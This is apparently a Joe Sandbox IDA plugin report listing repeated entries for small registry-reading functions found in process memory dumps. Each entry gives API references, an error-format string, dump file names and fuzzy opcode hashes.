registry_get_value, xrefs: 00007FFDA5573716
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA557371D

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 3c326c85f4fbd7045fafec4e4325012b0594580087f6753e4e477236207a0945
Instruction ID: 74c61854085bc61770685bbaeb8ac29f65e47a4d8ef8c052865cb6d2ffef7bcd
Opcode Fuzzy Hash: 3c326c85f4fbd7045fafec4e4325012b0594580087f6753e4e477236207a0945
Instruction Fuzzy Hash: D0F0C816B0E20F91E5538F10F8503756154BF42BA4F440535DD4D46392EF3CE9499304

Function 00007FFDA5573627 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55736CD

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

Strings

registry_get_value, xrefs: 00007FFDA5573716
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA557371D

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: d3d339eb22bdab7e5068ddab6fb510791d3596b47e2fd97ad28925f9d593c78f
Instruction ID: e1732909d6b9188d32cfd5234b67851615f7ab47309ac623425dd47753d44a47
Opcode Fuzzy Hash: d3d339eb22bdab7e5068ddab6fb510791d3596b47e2fd97ad28925f9d593c78f
Instruction Fuzzy Hash: 3CF0F626B0F20F92E6538F10F8503B96294BF42FA4F480539DD4C4A3A2EF3CE9499308

Function 00007FFDA55736AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55736CD

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

Strings

registry_get_value, xrefs: 00007FFDA5573716
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA557371D

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: d324351d120e8f53e3cbf5c41f81da0bd99e8f43cb9e228ad8fc60879fc627cd
Instruction ID: 3a27e9c7c799558ae2f7f565583c9017a00ec32f8680ad94a036c4070f1abd80
Opcode Fuzzy Hash: d324351d120e8f53e3cbf5c41f81da0bd99e8f43cb9e228ad8fc60879fc627cd
Instruction Fuzzy Hash: 91F0C816B0E20F91E5538F10F8503756154BF42BA4F440535DD4D46392DF3CE9499304

Function 00007FFDA55736BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55736CD

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

Strings

registry_get_value, xrefs: 00007FFDA5573716
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA557371D

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: ad59f99245fa03fbe69d5b6fb3e20d57b0d5a9e1a5f81e0c1c6902b27cefe1cc
Instruction ID: 33a1fed0122685040716a00cba45101c58e8b2082aca6c8ec447ad541c515ff7
Opcode Fuzzy Hash: ad59f99245fa03fbe69d5b6fb3e20d57b0d5a9e1a5f81e0c1c6902b27cefe1cc
Instruction Fuzzy Hash: 7BF0FC16B0F20F92E5538F10F8503756154BF42FA4F440535DD4D46792DF3CE9499304

Function 00007FFDA5573738 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55736CD

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

Strings

registry_get_value, xrefs: 00007FFDA5573716
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA557371D

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: ca098c04c38a53cda2ce60607ad5913827e2cdc37d9062dacfc7512572ea4e5e
Instruction ID: 82b7fa0c5bf319613c9965e77028eea6cbd4d4f96d9d25d1de9356f24b87c6f1
Opcode Fuzzy Hash: ca098c04c38a53cda2ce60607ad5913827e2cdc37d9062dacfc7512572ea4e5e
Instruction Fuzzy Hash: 80F0C816B0E20F91E6538F10F8503756194BF42BA4F480135DD4D46792DF3CD9499304

Function 00007FFDA5BA9E08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA5BA9D9D

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

Strings

registry_get_value, xrefs: 00007FFDA5BA9DE6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA5BA9DED

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 10bfcb33f060f6027eaff80277b33630d85b4bf41a5f3a3034f3e002bba8d5be
Instruction ID: 4e1970c31367cbfe1c08ac25cfb84bcb1fff30bd298e81aea6dbdac0976947c8
Opcode Fuzzy Hash: 10bfcb33f060f6027eaff80277b33630d85b4bf41a5f3a3034f3e002bba8d5be
Instruction Fuzzy Hash: 52F0FC52709B0E47E9528F00B8503BA6144BF42F96F080235EE5D46792DF6EEA859304

Function 00007FFDA5BA9D8C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA5BA9D9D

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

Strings

registry_get_value, xrefs: 00007FFDA5BA9DE6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA5BA9DED

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: bbf665d4db6d690a83c84e824dc23039c9886c6c1d3ea90658e1f35076a3aa27
Instruction ID: 21adb2cf948d7bb6d3bec6cebabde5cdb780e059e31f90a14e1694d3f4a8ca08
Opcode Fuzzy Hash: bbf665d4db6d690a83c84e824dc23039c9886c6c1d3ea90658e1f35076a3aa27
Instruction Fuzzy Hash: B8F0FC52709A0E47E9528F00B8503BA6144BF42F96F040135EE5D4A792DF6EEA459704

Function 00007FFDA5BA9D7E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA5BA9D9D

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

Strings

registry_get_value, xrefs: 00007FFDA5BA9DE6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA5BA9DED

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 805c7d7653d775cac45aba51234388f41b1c5ce80cc353cd24e6bcbff795ee86
Instruction ID: f6eabf957951688f7fc9255f9d616638ba11e4212091a53eb5d0353b9db1e4c3
Opcode Fuzzy Hash: 805c7d7653d775cac45aba51234388f41b1c5ce80cc353cd24e6bcbff795ee86
Instruction Fuzzy Hash: 7BF0FC52709A0E47E9528F00B8503BA6144FF42F96F040135EE5D4A792DF6EEA459304

Function 00007FFDA5BA9CF7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA5BA9D9D

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

Strings

registry_get_value, xrefs: 00007FFDA5BA9DE6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA5BA9DED

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 1aa315c62f3d8ffb2293b5c4ba76ef99169c468e844d2112630f02c2f2b8fce3
Instruction ID: d9576b49dee2f9a910caa1c3dec52000d23af56aac91e52cf474eb1bb6a75fae
Opcode Fuzzy Hash: 1aa315c62f3d8ffb2293b5c4ba76ef99169c468e844d2112630f02c2f2b8fce3
Instruction Fuzzy Hash: 96F0FC52709A0E47E9524F00F8503BA6144BF42F96F040135EE5D4A7D2DF6EEA459304

Function 00007FFDA5BA9CED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA5BA9D9D

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

Strings

registry_get_value, xrefs: 00007FFDA5BA9DE6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA5BA9DED

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: cd47fd6be89d19279995e972b41bed2155c15cdd2ada443eb605640005e1e961
Instruction ID: efe85a71f2e1b147335d77aaef4944eaaa7d5d481adca07a4ad9e924bceba2db
Opcode Fuzzy Hash: cd47fd6be89d19279995e972b41bed2155c15cdd2ada443eb605640005e1e961
Instruction Fuzzy Hash: 08F0FC52709B0E47E9528F00B8503BA6144BF42F96F040235EE5D4A792EF6EEA459304

Function 00007FFDAC12D60D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDAC12D6BD

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

Strings

registry_get_value, xrefs: 00007FFDAC12D706
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDAC12D70D

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 1883397dd7743ef319c74546f1c8ad4120f441726be8aac45c62918205eb1254
Instruction ID: 565697c0d3e2f4879a854fdbb5518332ca22147fe16228a0aa2197bb27ec5f70
Opcode Fuzzy Hash: 1883397dd7743ef319c74546f1c8ad4120f441726be8aac45c62918205eb1254
Instruction Fuzzy Hash: FEF0F667B0A74685E553AF00F8503BA2254EF803F4F480235DD4D4A792EF2DD985C309

Function 00007FFDAC12D617 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDAC12D6BD

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

Strings

registry_get_value, xrefs: 00007FFDAC12D706
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDAC12D70D

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 5d8f02b3bbd0833f1c1b99639b544f515b7be5ad4266852ad3d7312289d1ffed
Instruction ID: 51307661d60d0e6e917c43edafa466381f4026661155d7a0a54163d93d837d44
Opcode Fuzzy Hash: 5d8f02b3bbd0833f1c1b99639b544f515b7be5ad4266852ad3d7312289d1ffed
Instruction Fuzzy Hash: 96F0C267B0A74685E553AB00F8503BA2254EF803F4F480135DD4C4A792EF2DD989C309

Function 00007FFDAC12D69E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDAC12D6BD

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

Strings

registry_get_value, xrefs: 00007FFDAC12D706
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDAC12D70D

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 52dca2a1af83625b1d8857baa4ea338c45c588a9b07942b8c83f83f663b0948b
Instruction ID: d3631d61e1cefd16d0cf2ae8e99726d574e44e63accd9a14757644e7001e39bc
Opcode Fuzzy Hash: 52dca2a1af83625b1d8857baa4ea338c45c588a9b07942b8c83f83f663b0948b
Instruction Fuzzy Hash: 21F0F667B0A74685E553AF00F8503BA2254EF803F4F480136DD4D4A792EF2DD985C309

Function 00007FFDAC12D6AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDAC12D6BD

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

Strings

registry_get_value, xrefs: 00007FFDAC12D706
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDAC12D70D

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: a94f2b3a59f03209f560b29cced447069f7cefbb190824f2e4c7ec8b15025579
Instruction ID: fcdcd5c9a64effc92a33513493f42d7e8fef4bb32111dbc8d766c84b21377fce
Opcode Fuzzy Hash: a94f2b3a59f03209f560b29cced447069f7cefbb190824f2e4c7ec8b15025579
Instruction Fuzzy Hash: FBF0F667B0A74686E553AF00F8503BA6254EF803F4F480136DD4D4A792EF2DD985C309

Function 00007FFDAC12D728 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDAC12D6BD

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

Strings

registry_get_value, xrefs: 00007FFDAC12D706
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDAC12D70D

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 7fbede9ab6e892917caa8e9ff9fa6b1114ec0e30d3f62a1383d5cde42ff6b701
Instruction ID: b59eb668d1ad57aad88ffd6d82973d7e287144156624bcf1da7d195134105b2b
Opcode Fuzzy Hash: 7fbede9ab6e892917caa8e9ff9fa6b1114ec0e30d3f62a1383d5cde42ff6b701
Instruction Fuzzy Hash: 14F0F667B0A74681E693AF00F8503BA2254FF803F4F080235DD8D4A792EF2DD989D309

